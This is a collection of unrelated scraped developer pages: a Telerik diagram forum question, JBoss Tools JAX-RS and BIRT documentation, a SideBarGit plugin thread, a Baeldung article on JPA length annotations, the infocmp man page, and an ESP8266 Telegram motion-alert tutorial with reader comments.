Hello, I'd like to ask what is wrong in my scenario. I have a tab control with several tabs, and in every tab there is a RadDiagram. When I copy and paste within one diagram, everything is fine. When I copy an item from one diagram to another, I have some trouble with the style selector. In the first case (copy and paste within one diagram) the input parameter of the SelectStyle method is of type MindMapNode (my custom class representing a diagram node; it inherits NodeViewModelBase). But when I copy and paste from one diagram to another, the input parameter of the SelectStyle method is a Shape, so my logic for selecting the style can't handle it. Could you give me some advice on how to fix this? Thank you very much. Greetings, Jakub

Posted 12 Jun 2015

public class ShapeStyleSelector : StyleSelector
{
    public override System.Windows.Style SelectStyle(object item, System.Windows.DependencyObject
http://www.telerik.com/forums/copy-paste-between-diagrams
Support for a javax.ws.rs.core.Application subclass annotated with @ApplicationPath is now available, along with support for the standard JEE6 override in the web app deployment descriptor. The JAX-RS Tooling will include the @ApplicationPath annotation value in your endpoints' URI Path Template if you provide a JAX-RS Application class as below:

@ApplicationPath("/mypath")
public class MyApplication extends Application { ... }

Or if you define the application's root path for the JAX-RS endpoint in the web application's web.xml in one of the following manners:

<servlet-mapping>
  <servlet-name>com.acme.MyApplication</servlet-name>
  <url-pattern>/hello/*</url-pattern>
</servlet-mapping>

or

<servlet-mapping>
  <servlet-name>javax.ws.rs.core.Application</servlet-name>
  <url-pattern>/hello/*</url-pattern>
</servlet-mapping>

As defined in the JAX-RS 1.1 specification, the web.xml approach takes precedence over the annotation-based configuration. Related Jira

We recently had an opportunity to add some better shortcuts to get to the Web Service Tester from common access points in the UI. Most importantly, to go with our AS7 support, we now have right-click integration with the JAX-RS tooling for RESTful services. Now you can right-click on one of the exposed REST methods implemented by the service and select Run As...->Run on Server. This does a few things: A couple of caveats: In addition, you can now right-click on a WSDL and select Web Services -> Test in JBoss Web Service Tester. This action does two things: Unfortunately you can't quite run it in this state yet. It's a work in progress. I suspect we will implement a solution similar to the JAX-RS tooling integration, where you specify the server on which to run the service and we'll figure out the URL dynamically.
You'll still need to look at your deployed services in the web console to determine the URL of the service you want to test, then add "?WSDL" to the end so the tester can find the WSDL file in the running service. But it works the same as the WTP-provided Web Services Explorer. Whereas before we would only remember the URLs for the services tested in the current session, we now remember much more for each successful test: So now you can step back and forth through recent tests much more easily. If you change something from a previous test run, that change is persisted, so the next time you come back to that URL, you see your most recent settings.
http://docs.jboss.org/tools/whatsnew/ws/ws-news-1.2.2.Beta1.html
Same problem here. I'm on Mac. Git is on the path. os.path.exists('/usr/local/git/bin/git') returns True.

I am also seeing this. As far as I can tell I have the latest version. OSX 10.7.4, Sublime Text 2 Build 2181. I get this in the console:

import os; os.path.exists('/usr/local/git/bin/git')
True

When I try to use the sidebar menu to do anything I get the "Git not found on path" error just as the above few posts do. Is there anything else I can provide to help track down the issue?

Open the file /SideBarGit/sidebar/SideBarGit.py and below line 41, add

if object.command[0] == 'git': object.command[0] = '/usr/local/git/bin/git'

It needs to be at the same level of indentation as the previous line. That may work. No idea. Some people have strange path behaviour I don't have. Good luck. You may need to restart Sublime after the change.

It would be really awesome if you could double-click on an entry (for example in a git log result) and have Sublime Text open the corresponding file. Not sure if the API would support that. Also, the F5 update rocks, thanks!

One other thing: the liberal git command seems to truncate parameters, so when I use it to do git rm \pathspec --cached, what actually gets run is git rm \pathspec, a rather unfortunate (but recoverable) misinterpretation of my intent. UPDATE: Actually, I was wrong - it did exactly what I expected it to do.

Would love to see this feature too!! I do my work in branches exclusively, branched from master. It would be extremely helpful for me if I could do a "git diff master" or "git diff " through this plugin, have the diff output into a buffer, and navigate within that back and forth between the source code that is shown in the diff.

Hi tito, is the "Difftool" menu option supposed to call an external diff tool? If so, how do I configure it to work? Regards, Danny

Hi Tito, when entering a commit message, is there a way to select from messages I entered in the past?
Yep, I don't know which one; it was requested by a user. IIRC the default git installation provides a difftool, but for some reason I don't have it installed here.

Nope. You may want to use the short log viewer first: Log -> list of changes, latest 50. Regards,

I installed Kaleidoscope on my Mac and configured my ~/.gitconfig like this:

[difftool "Kaleidoscope"]
    cmd = ksdiff --partial-changeset --relative-path \"$MERGED\" -- \"$LOCAL\" \"$REMOTE\"
[diff]
    tool = Kaleidoscope
[difftool]
    prompt = false
[mergetool "Kaleidoscope"]
    cmd = ksdiff --merge --output \"$MERGED\" --base \"$BASE\" -- \"$LOCAL\" --snapshot \"$REMOTE\" --snapshot
    trustExitCode = true
[mergetool]
    prompt = false
[merge]
    tool = Kaleidoscope

I then restarted Sublime Text 2. However, choosing "git/Difftool/all changes since the last commit" does nothing. On the other hand, running "git difftool" from the terminal opens up Kaleidoscope showing the difference between 2 files. What could I be missing here?

Never mind. Discovered Sublime is looking for "ksdiff" in the path, which at this time was /usr/bin. So I created a symbolic link called /usr/bin/ksdiff which points to /Applications/Kaleidoscope.app/Contents/Resources/bin/ksdiff. Problem solved.

Hi. Is it possible to suppress the output to tabs? I currently use Add & Commit & Push a lot throughout the day, and every time two new tabs are opened with the output. This leads to me having to close quite a lot of tabs per day. It would be nice to have an option to suppress the opening of tabs, or at least have the output in a single tab and append the content every time. Great plugin otherwise.

I have the same problem; it's kind of annoying.

I can live with this for a bit, but I was really considering not opening a tab when no errors are present. So bear with me, I'll try to add something.

I own the Oblivion repo. I'll add it in.
https://forum.sublimetext.com/t/sidebargit/2857/34
Difference Between @Size, @Length, and @Column(length=value)

Last modified: April 30, 2019

1. Overview

In this quick tutorial, we'll take a look at Bean Validation's @Size, Hibernate's @Length, and JPA @Column's length attribute. At first blush, these may seem the same, but they perform different functions. Let's see how.

2. Origins

Simply put, all of these annotations are meant to communicate the size of a field. @Size and @Length are similar. We can use either to validate the size of a field. The first is a Java-standard annotation and the second is specific to Hibernate. @Column, though, is a JPA annotation that we use to control DDL statements. Now, let's go through each of them in detail.

3. @Size

For validations, we'll use @Size, a bean validation annotation. Let's use the property middleName annotated with @Size to validate that its length falls between the min and max attributes:

public class User {
    // ...
    @Size(min = 3, max = 15)
    private String middleName;
    // ...
}

Most importantly, @Size makes the bean independent of JPA and its vendors such as Hibernate. As a result, this is more portable than @Length.

4. @Length

And as we just stated, @Length is the Hibernate-specific version of @Size. Let's enforce the range for lastName using @Length:

@Entity
public class User {
    // ...
    @Length(min = 3, max = 15)
    private String lastName;
    // ...
}

5. @Column(length=value)

@Column, though, is quite different. We'll use @Column to indicate specific characteristics of the physical database column. Let's use the length attribute of the @Column annotation to specify the string-valued column length:

@Entity
public class User {
    @Column(length = 3)
    private String firstName;
    // ...
}

Consequently, the resulting column would be generated as a VARCHAR(3), and trying to insert a longer string would result in an SQL error. Note that we'll use @Column only to specify table column properties, as it doesn't provide validations.
Of course, we can use @Column together with @Size to specify a database column property with bean validation:

@Entity
public class User {
    // ...
    @Column(length = 5)
    @Size(min = 3, max = 5)
    private String city;
    // ...
}

6. Conclusion

In this write-up, we learned about the differences between the @Size annotation, @Length annotation and @Column's length attribute. We examined each separately within the areas of their use. As always, the full source code of the examples is available over on GitHub.
https://www.baeldung.com/jpa-size-length-column-differences
JBoss.org Community Documentation Version: 3.3.0.GA

BIRT plugin

You can find more detailed information on the BIRT plugin, its report types and anatomy on the BIRT Homepage. To understand the basic BIRT concepts and to learn how to create a basic BIRT report, refer to the Eclipse BIRT Tutorials. The next sections describe what extensions JBoss Tools provides for Eclipse BIRT. The key feature of JBoss BIRT Integration is the JBoss BIRT Integration Framework, which allows you to integrate a BIRT report into a Seam/JSF container. The framework API reference is in the JBoss BIRT Integration Framework API Reference chapter of the guide. This guide also covers the functionality of the JBoss Tools module which assists in integration with BIRT. The integration plug-in allows you to visually configure a Hibernate Data Source (specify a Hibernate configuration or JNDI URL) and compose HQL queries with syntax highlighting, content assist, and formatting, as well as other functionality available in the HQL editor. To enable JBoss Tools integration with BIRT you need the following:

Eclipse with JBoss Tools installed (how to install JBoss Tools on Eclipse, and what dependencies and version requirements apply, can be read in the JBoss Tools Installation section)

BIRT Report Designer (you can download BIRT Report Designer 2.3.2 from the Eclipse downloads site)

BIRT Web Tools Integration (you can download BIRT WTP Integration 2.3.2 from the Eclipse downloads site)

Versions of the BIRT framework and BIRT WTP integration should be no less than RC4 in order for the BIRT facet to work correctly. When Eclipse is first started with the JBoss Tools plugins installed, you may be prompted to allow or disallow anonymous statistics to be sent to the JBoss development team. You can find more information on the data that is sent in the Getting Started Guide. Click the button to allow the statistics to be sent, or click the button if you prefer not to send this data. The plugin is now installed and ready to use.
In this chapter of the guide you will find information on the tasks that you can perform when integrating BIRT. The required version of BIRT is 2.3.2 or greater. This section discusses the process of integrating BIRT into a Seam web project. To follow this guide you will need to have the Seam runtime and JBoss Application Server downloaded and extracted on your hard drive. You can download Seam from the Seam Framework web page and JBoss Application Server from the JBoss Application Server official site. JBoss Seam 2.2.1 GA and JBoss Application Server 5.1.0 GA were used in the examples presented in this guide. It is recommended that you open the Seam Perspective by selecting → → → . This perspective provides convenient access to all the Seam tools. To create a new Seam Web project select → → . If the Seam Perspective is not active, select → → → → . On the first wizard page enter the Project name, and specify the Target runtime and Target server. We recommend using the JBoss AS server and runtime environment to ensure best performance. In the Configuration group, select the Seam framework version you are planning to use in your application. In this guide we used Seam 2.2. Click the button and enable the Birt Reporting Runtime Component facet by checking the appropriate option. Alternatively, you can select the JBoss BIRT Integration Web Project configuration option from the drop-down list in the Configuration group. You may leave the next two pages with default values; just click the button to proceed. On the Birt Configuration page you can modify the BIRT deployment settings. These settings can also be edited afterwards in the web.xml file included in the generated project. Keep the default values for now. You can also leave the default options on the JSF Capabilities page. On the Seam Facet page you should specify the Seam runtime and Connection profile.
Please note that the Seam runtime must be the same version you initially specified in the project settings (see Figure 3.1, "Creating Seam Web Project"). When creating a Seam project with BIRT capabilities you can use the BIRT Classic Models Sample Database connection profile to work with the BIRT sample database. For more details on how to configure the database connection for a Seam project, please read the Configure Seam Facet Settings chapter of the Seam Dev Tools Reference Guide. Click the button to create the project with BIRT functionality enabled. In the previous section you created a Seam project with BIRT capabilities. Now you can create a simple kick-start project to see that everything is configured correctly. Now create a BIRT report file and insert test data into the file. Name the report file helloBirt.rptdesign in the WebContent folder. The report should print the data from the CLASSICMODELS.CUSTOMERS table of the BIRT Classic Models Sample Database, namely: Customer number (CLASSICMODELS.CUSTOMERS.CUSTOMERNAME), contact person first name (CLASSICMODELS.CUSTOMERS.CONTACTFIRSTNAME), contact person last name (CLASSICMODELS.CUSTOMERS.CONTACTLASTNAME), and contact person phone number (CLASSICMODELS.CUSTOMERS.PHONE). The title of the report should be set via the reportTitle parameter. As this guide is primarily focused on the BIRT integration and not the BIRT technology itself, the steps required to make the report will not be shown. For more information on creating a BIRT report file please read the BIRT documentation. When you are done with the helloBirt.rptdesign file, you should create a .xhtml file that will contain the BIRT report you have just created. The JBoss BIRT Integration framework provides two components represented as <b:birt> and <b:param> tags. The jboss-seam-birt.jar library implements the functionality of the components. To find more information about the framework, please read the JBoss BIRT Integration Framework API Reference chapter.
To use these tags on the page you need to declare the tag library and define the namespace like this: xmlns:b="" The <b:birt> tag is a container for a BIRT report that helps you integrate the report into the Seam environment. You can manage the properties of the report using the attributes of the <b:birt> tag. The <b:param> tag describes report parameters. To set a parameter you need to specify its name and the value you want to pass. You can use EL expressions to bind the representation layer with back-end logic. Create the helloBirt.xhtml file in the WebContent folder with the following content:

<!DOCTYPE composition PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "">
<ui:composition
  <ui:define
    <rich:panel>
      <b:birt
        <b:param
      </b:birt>
    </rich:panel>
  </ui:define>
</ui:composition>

From the listing above you can see that the title of the report is set via <b:param> by setting the parameter name and defining the value attribute with the Customers Contacts value. We have created a Seam project and inserted the helloBirt report into the helloBirt.xhtml view file. To see that the application works correctly and as you expect, you need to launch it on the server. In the Servers view (if it is not open, select → → → → ), select the server the application is deployed to and hit the button. When the server is started, open your favorite browser and point it to. The JBoss BIRT Integration feature includes the Hibernate ODA Data Source, which is completely integrated with Hibernate Tools. You can use it the same way you would use any of the BIRT ODA drivers. First, you need to reverse engineer from the database to generate Seam entities. You can perform this operation from the Seam perspective (for more details on Seam Generate Entities, please read the Seam Developer Tools Reference guide).
In this guide we will use the Employees table of the DATAMODELS database, which can be downloaded from the Getting Started Guide. Before performing Seam Generate Entities, you should have a connection profile adjusted and connected to a database. For information on how to do this see the CRUD Database Application chapter of the Seam Developer Tools Reference guide. Next you should create a new BIRT report file for the Employees table. Call the file employees.rptdesign, and save it in the WebContent folder. Now switch to the BIRT Report Design perspective. In the Data Explorer view right-click the Data Source node and choose . The wizard will prompt you to select a data source type. Choose Hibernate Data Source and give it a meaningful name, for instance HibernateDataSource. Click the button to proceed. On the next wizard dialog you can leave everything with default values; click the button to verify that the connection is established successfully. The Hibernate Data Source enables you to specify a Hibernate Configuration or JNDI URL. Click the button to complete the New Data Source wizard. Now you need to configure a new Hibernate ODA data set. Launch the New Data Set wizard: in the Data Explorer view right-click the Data Set node and select . Select HibernateDataSource as the target data source and type in the new data set name. Call it HibernateDataSet. The next dialog of the wizard will help you compose a query for the new data set. We will make a report that prints all employees in the database who have the Sales Rep job title:

select jobtitle, firstname, lastname, email
from Employees as employees
where employees.jobtitle = 'Sales Rep'

To validate the entered query you can press the button. All the HQL features like syntax highlighting, content assist, formatting, drag-and-drop, etc., are available to facilitate query composing. Clicking the button will call the Edit Data Set dialog, where you can adjust the parameters of the data set and preview the resulting set.
If everything looks good, click the button to generate the new data set. Now you can insert the data set items of HibernateDataSet into the employees.rptdesign file. If you don't know how to do this, we suggest that you refer to the Eclipse BIRT Tutorial. You can also use parameters in the query to make your report dynamic. In the previous example we hard-coded the selection criterion in the where clause. To specify the job title on the fly, your query should look like this:

select jobtitle, firstname, lastname, email
from Employees as employees
where employees.jobtitle = ?

The question mark represents a data set input parameter, which is not the same as a report parameter. Now you need to define a new report parameter to pass the data to the report; call it JobTitle. The data set parameter can be linked to a report parameter. In the Data Explorer view click the Data Set node to open it, right-click on the data set you created previously (in our case it is HibernateDataSet), choose Edit, and navigate to the Parameters section. Declare a new data set parameter, name it jobtitle, and map it to the already existing JobTitle report parameter. Your report is ready; you can view it by clicking on the Preview tab of the BIRT Report Designer editor. You will be prompted to assign a value to the report parameter; for instance, you can enter "Sales Rep". Section 3.1, "Adding BIRT Functionality to Standard Seam Web Project" and Section 3.2, "Using Hibernate ODA Data Source" describe how to integrate a BIRT report into a Seam web project and how to use a Hibernate data source to generate a dynamic report. In this section we will create a Seam web project that can make a dynamic report using parameters that are defined on a web page. We will use the PRODUCTS table of the Classic Models Inc. Sample Database for the purpose of this demo project.
The demo application will generate a report about the company's products and allow the user to specify how the report will be sorted. To begin with, we need to generate Seam entities as we did in the previous Section 3.1, "Adding BIRT Functionality to Standard Seam Web Project". The next step is to create a Java class that will store the sortOrder variable and its accessors. The variable will be required to pass dynamic data to the report via report parameters; therefore it has to be of session scope. The code below shows a simple JavaBean class called ReportJB.

import java.io.Serializable;
import org.jboss.seam.ScopeType;
import org.jboss.seam.annotations.Name;
import org.jboss.seam.annotations.Scope;

@Name("ReportJB")
@Scope(ScopeType.SESSION)
public class ReportJB implements Serializable {
    private static final long serialVersionUID = 1L;

    protected String sortOrder = "buyprice";

    public String getSortOrder() {
        return sortOrder;
    }

    public void setSortOrder(String value) {
        sortOrder = value;
    }

    public ReportJB() {
    }
}

The report will print the data from the Products table. Create a new report file called ProductsReport.rptdesign in the WebContent folder. You can use either the BIRT JDBC Data Source or the Hibernate Data Source to create the data set for this project. If you want to use the latter, please read the previous Section 3.2, "Using Hibernate ODA Data Source". The data set should have at least the following data set items: product vendor, product name, quantity in stock, and buy price. The data is retrieved from the database with this query:

SELECT productvendor, productname, quantityinstock, buyprice
FROM CLASSICMODELS.PRODUCTS as products

Make a table in the report and put each data set item into a column. As stated at the beginning of the chapter, the report will be dynamic, so you need to declare a report parameter first. Call this parameter sortOrder and add it to the query.
BIRT offers a rich JavaScript API, so you can modify the query programmatically like this (the xml-property tag shown below should already be present in the report):

<xml-property>
  <![CDATA[
    SELECT productvendor, productname, quantityinstock, buyprice
    FROM CLASSICMODELS.PRODUCTS as products
  ]]>
</xml-property>
<method name="beforeOpen">
  <![CDATA[
    queryString = " ORDER BY products."+reportContext.getParameterValue("sortOrder")+" "+"DESC";
    this.queryText = this.queryText+queryString;
  ]]>
</method>

The report is ready; you can preview it to make sure it works properly. To set the report parameter you should create an XHTML page, call it ProductForm.xhtml, and place it in the WebContent folder. On the page you can set the value of the sortOrder Java bean variable and click the button to open another view page that will display the resulting report. The source code of ProductForm.xhtml should be the following:

<!DOCTYPE composition PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "">
<ui:composition
  <ui:define
    <rich:panel>
      <f:facet>BIRT Report Generator</f:facet>
      <a4j:form
        <table>
          <tr>
            <td>Select sort order criterion:</td>
            <td><h:selectOneMenu
              <!-- Bind to your Java Bean -->
              <f:selectItem
              <f:selectItem
            </h:selectOneMenu>
            </td>
          </tr>
        </table>
      </a4j:form>
      <s:button
      <!-- If the sortOrder variable is not set the button won't work -->
    </rich:panel>
  </ui:define>
</ui:composition>

The logic of the file is quite simple: when the sort order criterion is selected, the value of ReportJB.sortOrder is set automatically via Ajax, and the report is ready to be generated. Now you need to create the web page that will print the report. Name the file ProductsReport.xhtml.
The file to output the report should have the following content:

<!DOCTYPE composition PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "">
<ui:composition
  <ui:define
    <rich:panel>
      <f:facet>Products Report</f:facet>
      <b:birt
        <b:param
      </b:birt>
    </rich:panel>
  </ui:define>
</ui:composition>

As you know from Section 3.1, "Adding BIRT Functionality to Standard Seam Web Project", before using the BIRT Integration framework tags on the page you need to declare the tag library and specify the namespace with this line: xmlns:b="" To set the sortOrder report parameter, add this line: <b:param We bound the sortOrder report parameter to the Java bean variable value="#{ReportJB.sortOrder}" using an EL expression, with the ReportJB.sortOrder variable having its value assigned in the ProductForm.xhtml file. By default, if you embed a report into an HTML page, the HTML-format report contains the <html>, <head>, <body>, etc. tags. However, if your HTML page already has those tags, you can get rid of them using the embeddable="true" attribute of the <b:birt> component. Deploy the project onto the server and open your browser to see that the report is successfully generated: navigate to the form page to select the criterion and press the button; you will be redirected to the report page. Thus, a Seam project that includes the BIRT facet can be deployed like any other project. If you define the Hibernate ODA driver, the JBoss BIRT engine will use a JNDI URL that has to be bound to either a Hibernate Session Factory or a Hibernate Entity Manager Factory. If you don't specify the JNDI URL property, our engine will try the following JNDI URLs:

java:/<project_name>
java:/<project_name>EntityManagerFactory

When creating a Seam EAR project, the Hibernate Entity Manager Factory is bound to java:/{projectName}EntityManagerFactory. All you need to do is use the Hibernate Configuration created automatically. You can use default values for the Hibernate Configuration and JNDI URL within the BIRT Hibernate Data Source.
When using a Seam WAR project, neither HSF nor HEMF are bound to JNDI by default. You have to do this manually. For instance, HSF can be bound to JNDI by adding the following property to the persistence.xml file:

    <property name="hibernate.session_factory_name" value="java:/projectname"/>

You can then use java:/projectname as the JNDI URL property when creating a BIRT Hibernate Data Source.

If you want to test this feature using PDE Runtime, you need to add osgi.dev=bin to the WebContent/WEB-INF/platform/configuration/config.ini file.

In conclusion, the main goal of this document is to describe the full feature set that JBoss BIRT Tools provide. If you have any questions, comments or suggestions on the topic, please feel free to ask in the JBoss Tools Forum. You can also influence how you want to see JBoss Tools docs in the future by leaving your vote on the article Overview of the improvements required by JBossTools/JBDS Docs users.

The <b:birt> component serves to integrate a BIRT report into a Seam or JSF container. The <b:birt> tag recognizes most of the parameters described on the BIRT Report Viewer Parameters page, though it has attributes of its own.

You can find additional JBoss Developer Studio documentation at the Red Hat documentation website. The latest documentation builds are available through the JBoss Tools Nightly Docs Builds.
http://docs.jboss.org/tools/4.1.0.Final/en/jboss_birt_plugin_ref_guide/html_single/index.html
infocmp(1m)

NAME
     infocmp - compare or print out terminfo descriptions

SYNOPSIS
     infocmp [-1CDEFGIKLTUVcdegilnpqrtux] [-v n] [-s d|i|l|c]
             [-R subset] [-w width] [-A directory] [-B directory]
             [termname...]

DESCRIPTION
     infocmp can be used to compare a binary terminfo entry with other
     terminfo entries, rewrite a terminfo description to take advantage
     of the use= terminfo field, or print out a terminfo description
     from the binary file (term) in a variety of formats. In all cases,
     the boolean fields will be printed first, followed by the numeric
     fields, followed by the string fields.

   Default Options
     If no options are specified and zero or one termnames are
     specified, the -I option will be assumed. If more than one
     termname is specified, the -d option will be assumed.

     infocmp compares the terminfo description of the first terminal
     with each of the descriptions given for the other terminals.

     The -u option produces a terminfo source description of the first
     terminal termname which is relative to the sum of the descriptions
     given by the entries for the other terminals (termnames). It does
     this by analyzing the differences and removing extra use= fields
     that are superfluous. infocmp will flag any other termname use=
     fields that were not needed.

   Changing Databases [-A directory] [-B directory]
     Like other ncurses utilities, infocmp looks for the terminal
     descriptions in several places. You can use the TERMINFO and
     TERMINFO_DIRS environment variables to override the compiled-in
     default list of places to search (see curses(3x) for details).

     You can also use the options -A and -B to override the list of
     places to search when comparing terminal descriptions:

     o   The -A option sets the location for the first termname.

     o   The -B option sets the location for the other termnames.

     Using these options, it is possible to compare descriptions for a
     terminal with the same name located in two different databases.
     For instance, you can use this feature for comparing descriptions
     for the same terminal created by different people.
     -D   tells infocmp to print the database locations that it knows
          about, and exit.

     -E   Dump the capabilities of the given terminal as tables, as
          needed in the C initializer for a TERMTYPE structure (the
          terminal capability structure in <term.h>). This option is
          useful for preparing versions of the capabilities separate
          from the TERMTYPE structure.

     -f   Display complex terminfo strings which contain
          if/then/else/endif expressions indented for readability.

     -G   Display constant literals in decimal form rather than their
          character equivalents.

     -R subset
          Restrict output to a given subset; this is for archaic
          terminfo variants with their own extensions incompatible
          with SVr4/XSI. Available terminfo subsets are "SVr1",
          "Ultrix", "HP", and "AIX"; see terminfo(5) for details. You
          can also choose the subset "BSD" which selects only
          capabilities with termcap equivalents recognized by 4.4BSD.

     -s [d|i|l|c]
          The -s option sorts the fields by database order, terminfo
          name, long name, or termcap name, respectively.

     Another option tells infocmp to not post-process the data after
     parsing the source file; this feature helps when comparing the
     actual contents of descriptions, including extensions to the
     terminfo repertoire which can be loaded using the -x option of
     tic.

FILES
     /usr/share/terminfo
          Compiled terminal description database.

SEE ALSO
     captoinfo(1m), infotocap(1m), tic(1m), toe(1m), curses(3x),
     terminfo(5).

     This describes ncurses version 5.9 (patch 20140816).

AUTHOR
     Eric S. Raymond <esr@snark.thyrsus.com> and
     Thomas E. Dickey <dickey@invisible-island.net>
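The comparison described above (capabilities defined in one description but not another) can be illustrated with a toy Python diff over capability dictionaries. This is only a sketch of the idea, not infocmp's actual algorithm; the entries and capability names below are made up:

```python
def diff_entries(first, second):
    """Toy version of infocmp -d: report capabilities whose values differ.

    Capabilities absent from one entry are reported as "NULL", loosely
    mirroring how infocmp marks missing string/numeric capabilities.
    """
    keys = sorted(set(first) | set(second))
    return {
        k: (first.get(k, "NULL"), second.get(k, "NULL"))
        for k in keys
        if first.get(k) != second.get(k)
    }

vt100 = {"cols": 80, "lines": 24, "am": True}
xterm = {"cols": 80, "lines": 24, "am": True, "km": True}
print(diff_entries(vt100, xterm))  # only 'km' differs between the two entries
```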
http://www.invisible-island.net/ncurses/man/infocmp.1m.html
This tutorial shows how to send notifications to your Telegram account when the ESP8266 NodeMCU detects motion. Here's an overview of how the project works:

- You'll create a Telegram bot for your ESP8266.
- The ESP8266 is connected to a PIR motion sensor.
- When the sensor detects motion, the ESP8266 sends a message to your Telegram account.

Make sure you have the required libraries installed in your Arduino IDE: go to Sketch > Include Library > Manage Libraries and install them. We're using ArduinoJson library version 6.5.12.

Parts Required

For this project, you need the following parts:

- ESP8266 (read Best ESP8266 development boards)
- Mini PIR Motion Sensor (AM312) or PIR motion sensor
- Breadboard
- Jumper wires

Schematic Diagram

For this project you need to wire a PIR motion sensor to your ESP8266 board. Follow the next schematic diagram. In this example, we're wiring the PIR motion sensor data pin to GPIO 14. You can use any other suitable GPIO. Read the ESP8266 GPIO Guide.

Telegram Motion Detection with Notifications – ESP8266

    #include <ESP8266WiFi.h>
    #include <WiFiClientSecure.h>
    #include <UniversalTelegramBot.h>

    X509List cert(TELEGRAM_CERTIFICATE_ROOT);
    WiFiClientSecure client;
    UniversalTelegramBot bot(BOTtoken, client);

    const int motionSensor = 14;  // PIR Motion Sensor
    bool motionDetected = false;  // Indicates when motion is detected

    void ICACHE_RAM_ATTR detectsMovement() {
      //Serial.println("MOTION DETECTED!!!");
      motionDetected = true;
    }

    void setup() {
      Serial.begin(115200);
      configTime(0, 0, "pool.ntp.org");  // get UTC time via NTP
      client.setTrustAnchors(&cert);     // Add root certificate for api.telegram.org
      // ...
    }

setup()

In the setup(), initialize the Serial Monitor.

    Serial.begin(115200);

For the ESP8266, you need to use the following line:

    client.setInsecure();

In the library examples for the ESP8266 they say: “This is the simplest way of getting this working.
If you are passing sensitive information, or controlling something important, please either use certStore or at least client.setFingerPrint”.

ESP8266 with PIR Motion Sensor using Interrupts and Timers

Init Wi-Fi

Initialize Wi-Fi and connect the ESP8266 board. Don't forget to go to Tools > Board and select the board you're using. Go to Tools > Port and select the COM port your board is connected to. After uploading the code, press the RST button on your ESP8266 NodeMCU board. When motion is detected, a message is sent. With this bot, you can also use your Telegram account to send messages to the ESP8266. Learn more about the ESP8266 with our resources. Thanks for reading.

69 thoughts on “Telegram: ESP8266 NodeMCU Motion Detection with Notifications (Arduino IDE)”

Nice! The code was very good and simple. Good job!

Can this code be adapted to send notifications every fifteen minutes of the thermistor reading connected to an ESP8266?
Yes. It's possible. Regards, Sara

Have issues with ESP8266 NodeMCU: compilation error. I can upload a basic file but this code won't upload. Reinstalled the drivers but nothing seems to help.
Hi. What is exactly the compilation error? Regards, Sara
Error compiling for board NodeMCU 1.0 (ESP-12E Module).

Can I use the ESP8266-01 module for this?
Yes, just make sure you use the right GPIO to support interrupts with the ESP-01:

That is very awesome code for using Telegram with the ESP8266, thank you Sarah and Rui! I tested it now on a Wemos ESP8266; the serial monitor shows “Motion Detection!!” but I have no message in my Telegram “my_bot” after I put /start in it. The bot code and chat id seem ok. What could be the problem? How can I troubleshoot this?
Did you add all the details to the ESP8266 code? The Telegram bot token and your Telegram user ID?

Hi Rui, finally I made a new bot, this time on , and there I could copy and paste the bot token very easily. So the fault with me was the previous bot token.
For me, there were no mistakes, but there was… Perhaps you could put this info in one of your tutorials?

Hi Sara, please help to advise how to go to my account to find my IDbot. Thanks.
You'll need to search for IDbot and it should appear in the users found…

I use the Wemos D1 mini for this and it works fine, thank you. To use a fixed IP address I used parts of a different code (which works), but with this code here it doesn't work. It is like the board reboots every time. I added these lines below “const char* password”:

    IPAddress staticIP(192, 168, 1, 61);
    IPAddress gateway(192, 168, 1, 1);
    IPAddress subnet(255, 255, 255, 0);
    IPAddress dns1(8, 8, 8, 8);
    IPAddress dns2(8, 8, 4, 4);

and below “WiFi.mode(WIFI_STA);” I added this line:

    WiFi.config(staticIP, gateway, subnet);

What is wrong and how do I use a fixed IP address with this code?

I did everything step by step. I can read “Motion detected” on the serial monitor but I could not get a message on Telegram. My library version is the same as yours; I do not understand why. I could not get it to work on the ESP32-CAM either; there is a message {“ok”:false,”error_code”:401,”description”:”[Error]: Unauthorized”}
Hi. Double-check your botToken. It is a long string, so you may get it wrong somewhere. Regards, Sara

Hi Sara, Rui and fans of Random Nerd Tutorials, make a new bot on , and there you can copy and paste the bot token into your sketch very easily and make no mistakes.
Hi. That's right! Thanks for the tip. Regards, Sara

Hi, just wondering if it's possible to send a “call” to the Telegram app on your phone?
Hi. What do you mean? Regards, Sara
Well, instead of sending a text it makes a phone call.

The PIR has an HT7133 regulator. It needs 5V according to the datasheet. It cannot be powered with 3.3V as you indicated in the diagram. I never made it work reliably with a 3.3V power supply. I assume this is a mistake.
Hi. We use this PIR motion sensor: It works with 3.3V.
Regards, Sara

Got a question here about the PIR sensor. I am using an LHI 878 sensor and I'm not sure what to apply to the pins. Ground is ok, but the others are S (assuming source) and D for drain. Is source going to D5 and D to 3V? Been getting some odd responses, thanks.
For the LHI 878 sensor I found this datasheet: There is a built-in MOSFET in source-follower configuration, so D goes to positive and S should then be the output. It is recommended to use a load resistor of 47 kohms, I read in the datasheet. The load goes between S and ground.

Really good project! Do I understand correctly that another user will not be able to see messages from the ESP8266?
Hi Alex. Yes, that's correct. Only the user with the CHAT_ID you've inserted. Regards, Sara
Then what if I want it for all users?
What do you mean, for all users?
You can simply remove the condition that checks the sender's UID. That way, it will listen to anyone who messages the bot. Regards, Sara

Sorry for being a pain. I tried to load this project on a WeMos D1 R1 and receive “error compiling board WeMos D1R1”. I loaded a basic program (Blink) and it loads fine, so I have to believe it is not a board issue, possibly a compatibility issue. What are your thoughts? Thanks
‘class axTLS::WiFiClientSecure’ has no member named ‘setInsecure’ I don’t know how to fix the error…. Thanks for the help So I have put this aside for some time now and decided to try it again, I get a boat load of error all related to the Arduinojson.h file. I at one time loaded an older version and got it to compile but now that don’t even work. I think I used 5.13 or something similar. Even then it would not see motion or scroll info on the serial monitor. If I crossed the sensor I think I jumped momentarily S and D it would show motion detected but never worked the way it was supposed to. Using LHI 878 with 49K across S – D , Esp8266 lolin typical connections for G 3v and S to D5. Hello and congratulations for your tutorials. I am a beginner in these ESP’s I love electronics and these projects. I tested this code and it worked perfectly in my first ESP8266 NodeMCU 1.0 ESP-12E, instead of the pir sensor I just used a microswitch to put it in the mailbox and receive alerts when the postman inserts a letter. I would like to know if it would be possible in the message (Motion Detected) send the battery reading Volts too? Hi. Yes, you can do that. You need to read the battery voltage using an analog pin. Regards, Sara Dear Sara, How to make the bot to notify if PIR or ESP goes offline? Someone who is making this as part of the simple security system would be interested to be notified about this Thx hi thanks for tutorial it works well my question is how can I add a light that turns on when the pir sensor acts at the same time it sends the message to the telegram (I am a learner) tested and working ….now try to change from pir motion to irsensor why can’t receive messages to telegram?? Hi. 